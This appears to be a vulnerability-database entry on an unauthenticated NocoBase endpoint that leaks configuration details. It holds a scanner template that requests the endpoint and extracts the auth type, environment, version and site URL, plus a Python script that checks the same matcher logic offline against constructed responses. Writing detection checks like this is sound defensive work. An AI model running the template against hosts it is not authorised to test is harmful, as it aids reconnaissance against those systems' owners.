The path /api/v1/db/meta/nocodb/info of the NocoBase web application is exposed without authentication, revealing internal configuration details (authentication type, environment, version, site URL and main subdomain). NocoBase is an extensibility-first, open-source no-code/low-code platform for building business applications and enterprise solutions.
PoC code [public]
id: nocobase-config

info:
  name: Nocobase - Config
  author: icarot
  severity: medium
  description: |
    The path /api/v1/db/meta/nocodb/info of the NocoBase web application is exposed, revealing internal information. NocoBase is an extensibility-first, open-source no-code/low-code platform for building business applications and enterprise solutions.
  reference:
    - https://github.com/nocobase/nocobase/
    - https://www.nocobase.com/
  metadata:
    max-request: 1
    vendor: nocobase
    product: nocobase
  tags: nocobase,config,exposed,vuln

http:
  - raw:
      - |
        GET /api/v1/db/meta/nocodb/info HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"authType":'
          - '"env":'
          - '"version":'
          - '"ncSiteUrl":'
          - '"mainSubDomain":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200

    extractors:
      - type: json
        json:
          - '"authType: " + .authType'
          - '"env: " + .env'
          - '"version: " + .version'
          - '"ncSiteUrl: " + .ncSiteUrl'
          - '"mainSubDomain: " + .mainSubDomain'
# digest: 4b0a0048304602210081298239c5423347a8f589dabd27da684d11653fb05253a040acd4d3e0a8bd64022100b94acd4199acaea84e1a6c24c898c0b323efab8e2cd02fbc10c23b9ca695f746:922c64590222798bb761d5b6d8e72950
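The template above combines three matchers with `matchers-condition: and` and then runs JSON extractors; the following added Python example (not part of the template or of the NocoBase project) reproduces that decision logic offline on constructed responses, so a defender can check a captured response from their own instance and confirm the endpoint no longer satisfies all three matchers after hardening.

```python
import json

# Keys the template's body word-matcher requires (its own condition: and).
REQUIRED_KEYS = ("authType", "env", "version", "ncSiteUrl", "mainSubDomain")


def evaluate_response(status, content_type, body):
    """Apply the template's three matchers (matchers-condition: and) to one
    HTTP response and, on a match, run the equivalent of its JSON extractors.

    Returns (matched, extracted); extracted mirrors the template's
    '"key: " + .key' extractor output strings.
    """
    # Matcher 1 (type: word, part: body): every '"key":' token must be present.
    words_ok = all(f'"{k}":' in body for k in REQUIRED_KEYS)
    # Matcher 2 (type: word, part: content_type): must contain application/json.
    ctype_ok = "application/json" in content_type
    # Matcher 3 (type: status): HTTP 200.
    status_ok = status == 200
    if not (words_ok and ctype_ok and status_ok):
        return False, []
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        # Matchers passed on raw text, but the body is not valid JSON:
        # the template would still report a match, with nothing extracted.
        return True, []
    extracted = [f"{k}: {data[k]}" for k in REQUIRED_KEYS if k in data]
    return True, extracted


# Constructed sample responses (not captured from any real host).
LEAKY = (200, "application/json; charset=utf-8",
         '{"authType":"jwt","env":"production","version":"0.0.0-example",'
         '"ncSiteUrl":"https://example.invalid","mainSubDomain":"app"}')
# What a hardened instance should answer: the info endpoint requires auth.
HARDENED = (401, "application/json", '{"msg":"Unauthorized"}')
# A 200 that is not JSON (e.g. a login page) must not match either.
HTML_200 = (200, "text/html; charset=utf-8", "<html><body>login</body></html>")

if __name__ == "__main__":
    for label, resp in (("leaky", LEAKY), ("hardened", HARDENED), ("html", HTML_200)):
        matched, fields = evaluate_response(*resp)
        print(f"{label}: matched={matched} extracted={fields}")
```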